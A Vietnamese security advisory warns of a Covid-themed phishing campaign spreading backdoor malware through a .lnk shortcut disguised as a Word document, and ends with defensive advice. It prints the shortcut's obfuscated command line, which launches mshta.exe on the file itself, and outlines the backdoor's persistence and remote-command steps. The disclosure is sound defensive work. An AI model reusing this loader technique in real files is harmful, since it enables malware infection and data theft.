HIỆP HỘI AN TOÀN THÔNG TIN VIỆT NAM

Cảnh giác với mã độc được phát tán qua email mạo danh thông báo về dịch Covid-19

Qua hệ thống CMC Threat Intelligence, công ty CMC Cyber Security đã phát hiện mã độc được chèn trong một tệp văn bản với tiêu đề “Chi thi cua Thu tuong Nguyen Xuan Phuc” nhằm đánh lừa người dùng.

Trong thời gian gần đây, do diễn biến của dịch Covid-19 khá phức tạp, nhiều nhóm tin tặc đã lợi dụng để thực hiện các chiến dịch tấn công có chủ đích nhằm vào các tổ chức trên thế giới, trong đó có cả ở Việt Nam.

Cảnh giác với mã độc được phát tán qua email mạo danh thông báo về dịch Covid-19

Mục tiêu của tệp tin độc hại

Theo báo cáo phân tích của CMC Cyber Security, mẫu mã độc mới này được phát tán qua email giả dạng thông báo của Thủ tướng về dịch Covid-19. Mẫu mã độc được phát hiện giống với một số mẫu do nhóm tin tặc Panda phát triển, chèn trong một tệp tin word có tiêu đề “Chi Thi cua Thu tuong nguyen xuan phuc”. Tệp tin có dạng shortcut với phần mở rộng là “.lnk” được ẩn dưới dạng winword nhằm đánh lừa người dùng, do đuôi “.lnk” sẽ được hệ điều hành Windows ẩn đi.

Tuy nhiên, tệp tin winword này sử dụng một mục tiêu đáng ngờ. Thông thường, mục tiêu của shorcut thường trỏ đến một thư mục hoặc file đích, nhưng tệp tin độc hại này lại chứa đoạn mã lệnh có dạng: “%comspec% /c for %x in (%temp%=%cd%) do for /f “delims==” %i in (‘dir “%x\Chi Thi cua thu tuong nguyen xuan phuc.lnk” /s /b’) do start m%windir:~-1,1%hta.exe “%i”.

Qua phân tích, các chuyên gia CMC Cyber Security cho biết, sau khi lừa người dùng tải về, mã độc sẽ lần lượt thực hiện các bước:

Bước 1: Tạo bản sao của 3 tệp tin thực thi vào thư mục profile của user hoặc AllUserProfile nếu có đủ quyền Administrator.

Bước 2: Thêm vào khóa autorun để tự kích hoạt tệp tin thực thi vừa tạo khi khởi động lại máy tính.

Bước 3: Mã độc tạo mutex, kết nối đến máy chủ để nhận lệnh.

Bước 4: Mã độc tạo cửa hậu cho phép kẻ tấn công thực thi lệnh từ xa. Khi đó, mã độc có thể thực hiện nhiều lệnh thực thi khác nhau, bao gồm: upload, list folder, read file, lấy cắp thông tin máy tính, người dùng…

“Bằng cách sử dụng nhiều kỹ thuật tấn công khác nhau và làm rối trong khi thực thi cho thấy rằng, người đứng sau phát triển mã độc này đã đầu tư không ít thời gian để nghiên cứu mục tiêu và phát triển phương pháp tấn công cho phù hợp. APT là một loại tấn công nguy hiểm, được đầu tư kỹ lưỡng nhằm đánh cắp các thông tin quan trọng và gây nhiều thiệt hại cho tổ chức. Để phòng ngừa các cuộc tấn công APT, người dùng luôn phải chuẩn bị các phương án đề phòng và giám sát liên tục mới có thể đảm bảo tính an toàn cho hệ thống của người dùng cũng như cả tổ chức”, chuyên gia bảo mật CMC Cyber Security nhấn mạnh.

Để không bị hacker lừa phát tán mã độc trong bối cảnh tin giả về dịch Covid-19 đang xuất hiện tràn lan trên mạng như hiện nay, người dùng cần nâng cao cảnh giác, chỉ đọc các thông tin từ nguồn chính thống của Bộ Y tế, Chính phủ; không mở email hay click vào link lạ; không mở các file được gửi từ nguồn không rõ ràng; thường xuyên cập nhật các bản vá bảo mật cho thiết bị cá nhân và không chia sẻ các thông tin không chính thống trên mạng xã hội.

Trường hợp bắt buộc phải tải tệp tin về nhưng phát hiện nghi ngờ về nội dung hoặc người gửi, người dùng cần chuyển tiếp email đó vào một email tạm thời khác và dùng một máy tính tách biệt với mạng đang làm việc để mở file, hoặc chuyển tiếp cho quản trị hệ thống. Nếu nắm sâu về kĩ thuật hơn nữa thì có thể thử mở các file nghi ngờ tại các môi trường an toàn hơn (như máy ảo).

Theo antoanthongtin.vn